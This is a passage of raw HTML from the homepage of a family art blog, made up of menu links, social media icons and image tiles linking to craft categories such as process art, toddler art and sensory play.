d="M13.4,12l7.1-7.1c0.4-0.4,0.4-1,0-1.4s-1-0.4-1.4,0L12,10.6L4.9,3.5c-0.4-0.4-1-0.4-1.4,0s-0.4,1,0,1.4l7.1,7.1 l-7.1,7.1c-0.4,0.4-0.4,1,0,1.4c0.4,0.4,1,0.4,1.4,0l7.1-7.1l7.1,7.1c0.4,0.4,1,0.4,1.4,0c0.4-0.4,0.4-1,0-1.4L13.4,12z"/></svg></div></a><ul id="menu-home-menu" class="tve_w_menu tve-m-collapsed tve_horizontal tve_red"><li id="menu-item-15756" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15756 thrv_wrapper thrv-menu-item-element"><a href="https://www.artbarblog.com/about-2/" itemprop="url"><span class="tve-disabled-text-inner">ABOUT</span></a></li> <li id="menu-item-15754" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-15754 thrv_wrapper thrv-menu-item-element"><a href="https://www.artbarblog.com/blog/" itemprop="url"><span class="tve-disabled-text-inner">BLOG</span></a></li> <li id="menu-item-15707" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15707 thrv_wrapper thrv-menu-item-element"><a href="https://www.artbarblog.com/privacy-policy/" itemprop="url"><span class="tve-disabled-text-inner">PRIVACY</span></a></li> <li id="menu-item-15755" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15755 thrv_wrapper thrv-menu-item-element"><a href="mailto:[email protected]" itemprop="url"><span class="tve-disabled-text-inner">CONTACT</span></a></li> <li id="foodie-social" class="foodie-social menu-item"><aside class="widget-area"><h2 class="genesis-sidebar-title screen-reader-text">Nav Social Menu</h2><section id="simple-social-icons-2" class="widget simple-social-icons"><div class="widget-wrap"><ul class="aligncenter"><li class="ssi-facebook"><a href="https://www.facebook.com/artbarblog/" target="_blank"><svg role="img" class="social-facebook" aria-labelledby="social-facebook-2"><title id="social-facebook-2">Facebook</title><use xlink:href="https://www.artbarblog.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-facebook"></use></svg></a></li><li class="ssi-instagram"><a href="https://www.instagram.com/artbarblog/?hl=en" target="_blank"><svg role="img" class="social-instagram" aria-labelledby="social-instagram-2"><title id="social-instagram-2">Instagram</title><use xlink:href="https://www.artbarblog.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-instagram"></use></svg></a></li><li class="ssi-pinterest"><a href="https://www.pinterest.com/barrucci/" target="_blank"><svg role="img" class="social-pinterest" aria-labelledby="social-pinterest-2"><title id="social-pinterest-2">Pinterest</title><use xlink:href="https://www.artbarblog.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-pinterest"></use></svg></a></li><li class="ssi-twitter"><a href="https://twitter.com/artbarblog?lang=en" target="_blank"><svg role="img" class="social-twitter" aria-labelledby="social-twitter-2"><title id="social-twitter-2">Twitter</title><use xlink:href="https://www.artbarblog.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-twitter"></use></svg></a></li><li class="ssi-youtube"><a href="https://www.youtube.com/channel/UCWnkHy9VZKPHnQ-VCDhBPrA" target="_blank"><svg role="img" class="social-youtube" aria-labelledby="social-youtube-2"><title id="social-youtube-2">YouTube</title><use xlink:href="https://www.artbarblog.com/wp-content/plugins/simple-social-icons/symbol-defs.svg#social-youtube"></use></svg></a></li></ul></div></section> </aside><form class="search-form" itemprop="potentialAction" itemscope itemtype="https://schema.org/SearchAction" method="get" action="https://www.artbarblog.com/" role="search"><meta itemprop="target" content="https://www.artbarblog.com/?s={s}"/><label class="search-form-label screen-reader-text" for="searchform-5cdd886349cd74.09792654">Search</label><input itemprop="query-input" type="search" name="s" id="searchform-5cdd886349cd74.09792654" placeholder="Search" /><input type="submit" value="Search" /></form></li></ul></div> </div><div class="thrv_wrapper thrv-page-section tcb-mobile-hidden tcb-tablet-hidden" data-css="tve-u-16643466697" style=""> <div class="tve-page-section-out"></div> <div class="tve-page-section-in tve_empty_dropzone" data-css="tve-u-166451ce8ac"><div class="thrv_wrapper thrv-columns" data-css="tve-u-16643416892"><div class="tcb-flex-row tcb--cols--5 tcb-resized" data-css="tve-u-1664346bc8c"><div class="tcb-flex-col" data-css="tve-u-16644fc4418" style=""><div class="tcb-col"><div class="thrv_wrapper thrv_text_element tcb-mobile-hidden tcb-tablet-hidden" data-css="tve-u-16643477284" style=""><p data-css="tve-u-16643497b49" style="text-align: center;"><a data-css="tve-u-1664b228e64" href="https://www.artbarblog.com/about-2/">ABOUT</a></p></div></div></div><div class="tcb-flex-col" data-css="tve-u-16644fc4437" style=""><div class="tcb-col"><div class="thrv_wrapper thrv_text_element tcb-mobile-hidden tcb-tablet-hidden" data-css="tve-u-1664347655b" style=""><p data-css="tve-u-16643499bae" style="text-align: center;"><a data-css="tve-u-1664b230da5" href="https://www.artbarblog.com/blog/">BLOG</a></p></div></div></div><div class="tcb-flex-col" data-css="tve-u-16644fc4457" style=""><div class="tcb-col"><div class="thrv_wrapper thrv_text_element tcb-mobile-hidden tcb-tablet-hidden" data-css="tve-u-1664347584c" style=""><p data-css="tve-u-1664349c266" style="text-align: center;"><a data-css="tve-u-1664b23318c" href="mailto:[email protected]">CONTACT</a></p></div></div></div><div class="tcb-flex-col" data-css="tve-u-16644fc4479"><div class="tcb-col"><div class="thrv_wrapper thrv_text_element tcb-mobile-hidden tcb-tablet-hidden" data-css="tve-u-16643474281" style=""><p data-css="tve-u-1664349e108" style="text-align: center;"><a data-css="tve-u-1664b23632b" href="https://www.artbarblog.com/privacy-policy/">PRIVACY</a></p></div></div></div><div class="tcb-flex-col" data-css="tve-u-16644fc4498"><div class="tcb-col"><div class="thrv_wrapper thrv-columns tcb-mobile-hidden tcb-tablet-hidden" data-css="tve-u-1664345c3ca" style=""><div class="tcb-flex-row tcb--cols--4 v-2" data-css="tve-u-1664345cbd7"><div class="tcb-flex-col"><div class="tcb-col" style=""><a href="https://www.facebook.com/artbarblog/" target="_blank" rel=" nofollow"><div class="thrv_wrapper thrv_icon tcb-icon-display" data-css="tve-u-16643446433" data-link-wrap="1"><svg class="tcb-icon" viewBox="0 0 264 512" data-id="icon-facebook-f-brands" data-name="Facebook F"> <path d="M76.7 512V283H0v-91h76.7v-71.7C76.7 42.4 124.3 0 193.8 0c33.3 0 61.9 2.5 70.2 3.6V85h-48.2c-37.8 0-45.1 18-45.1 44.3V192H256l-11.7 91h-73.6v229"></path> </svg></div></a></div></div><div class="tcb-flex-col"><div class="tcb-col" style=""><a href="https://www.instagram.com/artbarblog/?hl=en" target="_blank" rel=" nofollow"><div class="thrv_wrapper thrv_icon tcb-icon-display" data-css="tve-u-1664344d0b1" data-link-wrap="1"><svg class="tcb-icon" viewBox="0 0 448 512" data-id="icon-instagram-brands" data-name="Instagram"> <path d="M224.1 141c-63.6 0-114.9 51.3-114.9 114.9s51.3 114.9 114.9 114.9S339 319.5 339 255.9 287.7 141 224.1 141zm0 189.6c-41.1 0-74.7-33.5-74.7-74.7s33.5-74.7 74.7-74.7 74.7 33.5 74.7 74.7-33.6 74.7-74.7 74.7zm146.4-194.3c0 14.9-12 26.8-26.8 26.8-14.9 0-26.8-12-26.8-26.8s12-26.8 26.8-26.8 26.8 12 26.8 26.8zm76.1 27.2c-1.7-35.9-9.9-67.7-36.2-93.9-26.2-26.2-58-34.4-93.9-36.2-37-2.1-147.9-2.1-184.9 0-35.8 1.7-67.6 9.9-93.9 36.1s-34.4 58-36.2 93.9c-2.1 37-2.1 147.9 0 184.9 1.7 35.9 9.9 67.7 36.2 93.9s58 34.4 93.9 36.2c37 2.1 147.9 2.1 184.9 0 35.9-1.7 67.7-9.9 93.9-36.2 26.2-26.2 34.4-58 36.2-93.9 2.1-37 2.1-147.8 0-184.8zM398.8 388c-7.8 19.6-22.9 34.7-42.6 42.6-29.5 11.7-99.5 9-132.1 9s-102.7 2.6-132.1-9c-19.6-7.8-34.7-22.9-42.6-42.6-11.7-29.5-9-99.5-9-132.1s-2.6-102.7 9-132.1c7.8-19.6 22.9-34.7 42.6-42.6 29.5-11.7 99.5-9 132.1-9s102.7-2.6 132.1 9c19.6 7.8 34.7 22.9 42.6 42.6 11.7 29.5 9 99.5 9 132.1s2.7 102.7-9 132.1z"></path> </svg></div></a></div></div><div class="tcb-flex-col"><div class="tcb-col"><a href="https://www.pinterest.com/barrucci/" target="_blank" rel=" nofollow"><div class="thrv_wrapper thrv_icon tcb-icon-display" data-css="tve-u-16643450a35" data-link-wrap="1"><svg class="tcb-icon" viewBox="0 0 384 512" data-id="icon-pinterest-p-brands" data-name="Pinterest P"> <path d="M204 6.5C101.4 6.5 0 74.9 0 185.6 0 256 39.6 296 63.6 296c9.9 0 15.6-27.6 15.6-35.4 0-9.3-23.7-29.1-23.7-67.8 0-80.4 61.2-137.4 140.4-137.4 68.1 0 118.5 38.7 118.5 109.8 0 53.1-21.3 152.7-90.3 152.7-24.9 0-46.2-18-46.2-43.8 0-37.8 26.4-74.4 26.4-113.4 0-66.2-93.9-54.2-93.9 25.8 0 16.8 2.1 35.4 9.6 50.7-13.8 59.4-42 147.9-42 209.1 0 18.9 2.7 37.5 4.5 56.4 3.4 3.8 1.7 3.4 6.9 1.5 50.4-69 48.6-82.5 71.4-172.8 12.3 23.4 44.1 36 69.3 36 106.2 0 153.9-103.5 153.9-196.8C384 71.3 298.2 6.5 204 6.5z"></path> </svg></div></a></div></div><div class="tcb-flex-col"><div class="tcb-col" style=""><a href="https://www.youtube.com/channel/UCWnkHy9VZKPHnQ-VCDhBPrA" target="_blank" rel=" nofollow"><div class="thrv_wrapper thrv_icon tcb-icon-display" data-css="tve-u-16643453c1f" data-link-wrap="1"><svg class="tcb-icon" viewBox="0 0 576 512" data-id="icon-youtube-brands" data-name="YouTube"> <path d="M549.655 124.083c-6.281-23.65-24.787-42.276-48.284-48.597C458.781 64 288 64 288 64S117.22 64 74.629 75.486c-23.497 6.322-42.003 24.947-48.284 48.597-11.412 42.867-11.412 132.305-11.412 132.305s0 89.438 11.412 132.305c6.281 23.65 24.787 41.5 48.284 47.821C117.22 448 288 448 288 448s170.78 0 213.371-11.486c23.497-6.321 42.003-24.171 48.284-47.821 11.412-42.867 11.412-132.305 11.412-132.305s0-89.438-11.412-132.305zm-317.51 213.508V175.185l142.739 81.205-142.739 81.201z"></path> </svg></div></a></div></div></div></div></div></div></div></div></div> </div><div class="thrv_wrapper thrv_text_element tcb-desktop-hidden tcb-tablet-hidden" data-css="tve-u-166442a1dc1" style=""><p data-css="tve-u-166445fa032" style="text-align: center;"><strong>ART IDEAS FOR THE WHOLE FAMILY</strong></p></div><div class="thrv_wrapper thrv_text_element tcb-mobile-hidden" data-css="tve-u-166445f2ef5" style=""><p data-css="tve-u-166442bc496" style="text-align: center;"><strong>ART IDEAS FOR THE WHOLE FAMILY</strong></p></div><div class="thrv_wrapper thrv-columns tcb-mobile-hidden" data-css="tve-u-166434c6cca"><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-16644375d33" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/process_art/" rel=""><img class="tve_image wp-image-15716" alt="" width="286" height="300" title="home_bubble_wrap_tree" data-id="15716" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664433dcc9"><p data-css="tve-u-166443427a0" style="text-align: center;"><a data-css="tve-u-16644347cd9" href="https://www.artbarblog.com/category/process_art/"><strong>PROCESS ART</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col" style=""><div class="thrv_wrapper tve_image_caption" data-css="tve-u-16644009847"><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/recycled/"><img class="tve_image wp-image-15698" alt="" width="279" height="300" title="home_shoebox_mansion" data-id="15698" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664439713e"><p style="text-align: center;"><a data-css="tve-u-1664439e28e" href="https://www.artbarblog.com/category/recycled/"><strong>RECYCLED ART</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664400c05f"><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/nature-art/"><img class="tve_image wp-image-15700" alt="" width="279" height="300" title="home_sun_prints" data-id="15700" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166443e0dae"><p data-css="tve-u-166443db6fe" style="text-align: center;"><a data-css="tve-u-166443e5136" href="https://www.artbarblog.com/category/nature-art/"><strong>NATURE ART</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv-columns tcb-desktop-hidden tcb-tablet-hidden" data-css="tve-u-1664460e47f" style=""><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col" style=""><div class="thrv_wrapper tve_image_caption" data-css="tve-u-16644619c66" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/process_art/"><img class="tve_image wp-image-15716" alt="" width="286" height="300" title="home_bubble_wrap_tree" data-id="15716" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree-286x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree-286x300.jpg 286w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree-381x400.jpg 381w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree-350x368.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree-595x625.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_bubble_wrap_tree.jpg 600w" sizes="(max-width: 286px) 100vw, 286px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664461df81" style=""><p data-css="tve-u-166443427a0" style="text-align: center;"><a data-css="tve-u-1664461c4c3" href="https://www.artbarblog.com/category/process_art/"><strong>PROCESS ART</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col" style=""><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664461ede7"><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/recycled/"><img class="tve_image wp-image-15698" alt="" width="279" height="300" title="home_shoebox_mansion" data-id="15698" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_shoebox_mansion.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166446211cc" style=""><p style="text-align: center;"><a data-css="tve-u-16644622174" href="https://www.artbarblog.com/category/recycled/"><strong>RECYCLED ART</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col" style=""><div class="thrv_wrapper tve_image_caption" data-css="tve-u-16644622f38"><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/nature-art/"><img class="tve_image wp-image-15700" alt="" width="279" height="300" title="home_sun_prints" data-id="15700" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_sun_prints.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-16644626ae7" style=""><p data-css="tve-u-166443db6fe" style="text-align: center;"><a data-css="tve-u-16644624beb" href="https://www.artbarblog.com/category/nature-art/"><strong>NATURE ART</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv-columns tcb-mobile-hidden" data-css="tve-u-16644010cd7"><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166442efae6" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/open_ended_crafts_for_kids/"><img class="tve_image wp-image-15695" alt="" width="279" height="300" title="home_rainbow_weaving" data-id="15695" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166443f8125"><p data-css="tve-u-166443fc4cd" style="text-align: center;"><a data-css="tve-u-16644400e12" href="https://www.artbarblog.com/category/open_ended_crafts_for_kids/"><strong>CRAFTS for KIDS</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166442e8ea1"><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/art-for-toddlers/"><img class="tve_image wp-image-15697" alt="" width="279" height="300" title="home_scrape_painting" data-id="15697" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166442e2438"><p data-css="tve-u-166442eab4d" style="text-align: center;"><a data-css="tve-u-1664431c53d" href="https://www.artbarblog.com/category/art-for-toddlers/"><strong>TODDLER ART</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col" style="" data-css="tve-u-166444524ca"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166442ef0ac" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/teen-craft/"><img class="tve_image wp-image-15701" alt="" width="279" height="300" title="home_teen_crafts" data-id="15701" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664443e9b9" style=""><p style="text-align: center;"><a data-css="tve-u-1664443cdf0" href="https://www.artbarblog.com/category/teen-craft/"><strong>TEEN CRAFTS</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv-columns tcb-desktop-hidden tcb-tablet-hidden" data-css="tve-u-16644611fcc"><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col" style="" data-css="tve-u-166450f92a1"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-16644627c7c" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/open_ended_crafts_for_kids/"><img class="tve_image wp-image-15695" alt="" width="279" height="300" title="home_rainbow_weaving" data-id="15695" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_weaving.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664462c597" style=""><p data-css="tve-u-166443fc4cd" style="text-align: center;"><a data-css="tve-u-1664462af3f" href="https://www.artbarblog.com/category/open_ended_crafts_for_kids/"><strong>CRAFTS for KIDS</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664462d3f7"><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/art-for-toddlers/"><img class="tve_image wp-image-15697" alt="" width="279" height="300" title="home_scrape_painting" data-id="15697" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_scrape_painting.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664462efe7" style=""><p data-css="tve-u-166442eab4d" style="text-align: center;"><a data-css="tve-u-1664462fef5" href="https://www.artbarblog.com/category/art-for-toddlers/" target="_blank"><strong>TODDLER ART</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col" style="" data-css="tve-u-166444524ca"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-1664463163b" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/teen-craft/"><img class="tve_image wp-image-15701" alt="" width="279" height="300" title="home_teen_crafts" data-id="15701" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_teen_crafts.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166446340d8" style=""><p style="text-align: center;"><a data-css="tve-u-16644632f84" href="https://www.artbarblog.com/category/teen-craft/"><strong>TEEN CRAFTS</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv-columns tcb-mobile-hidden" data-css="tve-u-166440199cc"><div class="tcb-flex-row tcb--cols--3"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166442f5b73" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/diy/"><img class="tve_image wp-image-15694" alt="" width="279" height="300" title="home_rainbow_pompom" data-id="15694" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_rainbow_pompom.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-1664448b496" style=""><p style="text-align: center;"><a data-css="tve-u-1664449b94b" href="https://www.artbarblog.com/category/diy/"><strong>DIY</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166442f63db" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/recipesplay/"><img class="tve_image wp-image-15691" alt="" width="279" height="300" title="home_model_magic_slime" data-id="15691" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_model_magic_slime.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166444b4886" style=""><p style="text-align: center;"><a data-css="tve-u-166444bae3d" href="https://www.artbarblog.com/category/recipesplay/"><strong>SENSORY PLAY</strong></a></p></div></div></div><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-166442f6b40" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/artist-study/"><img class="tve_image wp-image-15692" alt="" width="279" height="300" title="home_okeeffe" data-id="15692" src="//www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe-279x300.jpg" style="width: 100%;" srcset="https://www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe-279x300.jpg 279w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe-372x400.jpg 372w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe-350x376.jpg 350w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe-595x640.jpg 595w, https://www.artbarblog.com/wp-content/uploads/2018/10/home_okeeffe.jpg 600w" sizes="(max-width: 279px) 100vw, 279px" /></a></span></div><div class="thrv_wrapper thrv_text_element" data-css="tve-u-166444ea37f" style=""><p style="text-align: center;"><a data-css="tve-u-166444fdadf" href="https://www.artbarblog.com/category/artist-study/"><strong>ARTIST STUDIES</strong></a></p></div></div></div></div></div><div class="thrv_wrapper thrv-columns tcb-desktop-hidden tcb-tablet-hidden" data-css="tve-u-16644614b51" style=""><div class="tcb-flex-row tcb--cols--3 v-2"><div class="tcb-flex-col"><div class="tcb-col"><div class="thrv_wrapper tve_image_caption" data-css="tve-u-16644635120" style=""><span class="tve_image_frame" style="width: 100%;"><a href="https://www.artbarblog.com/category/diy/"><img 